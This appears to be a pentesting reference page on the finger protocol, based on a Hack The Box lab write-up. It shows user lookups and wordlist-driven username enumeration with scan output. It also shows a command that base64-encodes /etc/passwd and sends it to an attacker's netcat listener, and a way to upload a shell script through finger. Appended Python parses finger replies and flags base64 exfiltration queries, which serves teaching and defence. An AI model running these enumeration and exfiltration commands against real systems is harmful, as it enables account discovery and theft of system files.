# Pentesting Finger

### Overview

* The [finger](https://en.wikipedia.org/wiki/Finger_protocol) daemon listens on TCP port 79 and is a relic of a time when computers were far too trusting and open. It reports which users are currently logged in, and can also give details about a specific user, including when and from where they last logged in.
* Credit: <https://0xdf.gitlab.io/2018/09/29/htb-sunday.html>

```
PORT      STATE SERVICE   VERSION
79/tcp    open  finger    Sun Solaris fingerd
```

* Finger is an exceedingly old protocol that is very rarely in use today.
* Nmap's finger script output can show logged-in users:

```
| finger: Login       Name               TTY         Idle    When    Where\x0D
| sunny    sunny                 pts/1            Thu 14:52  10.10.14.245        \x0D
```

### Check for logged-in users

```
finger @10.10.10.76
No one logged on
```

### Check for details on a user

```
finger jack@10.10.10.76
jack                  ???
# the user above does not exist
finger root@10.10.10.76
Login       Name               TTY         Idle    When    Where
root     Super-User            console      <Oct 14 10:28>
# user that does exist and is logged in
finger ikeuser@10.10.10.76
Login       Name               TTY         Idle    When    Where
ikeuser  IKE Admin                          < .  .  .  . >
# user that does exist but is not logged in
```

### Brute-force Users

If finger returns no logged-in users, we can try to brute-force usernames. We’ll use the [finger-user-enum.pl](http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz) script from pentestmonkey. Note that wordlist entries containing a space (such as `anne marie`) are sent as one query and come back as two separate lookups, as the output below shows.

```
root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /opt/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Thu Sep 27 17:39:02 2018 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..uucp     uucp Admin                         < .  .  .  . >..nuucp    uucp Admin                         < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..listen   Network Admin                      < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..jo                    ???..ann                   ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin         
```

### Finger for File Transfer

While working on this post, I was checking out [gtfobins](https://gtfobins.github.io/), and their page on finger shows how it can be used for file transfer. For example, to exfil the password file from Sunday, with the listener started locally:

```
root@sunday:~# finger "$(base64 /etc/passwd)"@10.10.14.5
[10.10.14.5]
```

```
root@kali:~/hackthebox/sunday-10.10.10.76# nc -lnvp 79 | base64 -d > passwd
listening on [any] 79 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.76] 54768

root@kali:~/hackthebox/sunday-10.10.10.76# cat passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
...[snip]...
```

You can upload files to a target machine as well:

```
root@kali:~/hackthebox/sunday-10.10.10.76# cat shell.py | base64 | nc -lp 79
```

```
root@sunday:~# finger x@10.10.14.5 > shell.b64
```
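The following Python is an added example, not code from the original post or from gtfobins, covering two things above: it builds the RFC 1288 query a finger client sends and classifies Solaris-style replies into the three shapes shown in the "Check for details on a user" section (unknown login, known login with no session, logged-in user), and it gives a defender-side check that flags the oversized base64 "username" the file-transfer trick produces. All sample replies and the passwd lines are constructed; `finger()` is the only part that touches the network and is not used by the checks.

```python
import base64
import re
import socket

# RFC 1288 query format: "<user>\r\n", or a bare "\r\n" to list logged-in users.
def build_query(user=""):
    """Return the raw bytes a finger client sends for one query."""
    return f"{user}\r\n".encode()

def finger(host, user="", port=79, timeout=5):
    """Send one query over TCP/79 and return the decoded reply (live network helper)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_query(user))
        chunks = []
        while chunk := s.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks).decode(errors="replace")

# Solaris fingerd reply shapes seen above: "< .  .  .  . >" in the When column
# marks a known login with no session; "???" with nothing else marks an unknown
# login (a known login with no GECOS name also shows "???", but keeps the When
# column); a TTY plus a real timestamp marks a login that is currently active.
NEVER_LOGGED_IN = re.compile(r"<\s*\.\s+\.\s+\.\s+\.\s*>")

def parse_reply(reply):
    """Map each login named in a reply to 'unknown', 'not logged in' or 'logged in'."""
    status = {}
    for line in reply.replace("\r", "").splitlines():
        if not line.strip() or line.startswith("Login ") or line.startswith("No one"):
            continue  # header, blank line, or "No one logged on": no login to record
        login = line.split()[0]
        if NEVER_LOGGED_IN.search(line):
            status[login] = "not logged in"
        elif "???" in line:
            status[login] = "unknown"
        else:
            status[login] = "logged in"
    return status

# Defender-side check: real logins are short, so a query whose user field is a
# long run of base64 is the file-transfer trick above rather than a lookup.
def looks_like_exfil(query, max_login_len=32):
    """Flag a raw query whose user field is far longer than any real login name."""
    # "$(base64 file)" keeps the CLI's 76-column wrapping, so drop whitespace first.
    user = re.sub(r"\s+", "", query.decode(errors="replace"))
    return len(user) > max_login_len and re.fullmatch(r"[A-Za-z0-9+/=]+", user) is not None

# Constructed sample passwd lines, not a capture from any real host.
SAMPLE_PASSWD = b"root:x:0:0:Super-User:/root:/usr/bin/bash\ndaemon:x:1:1::/:\n"
EXFIL_QUERY = build_query(base64.encodebytes(SAMPLE_PASSWD).decode())
```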
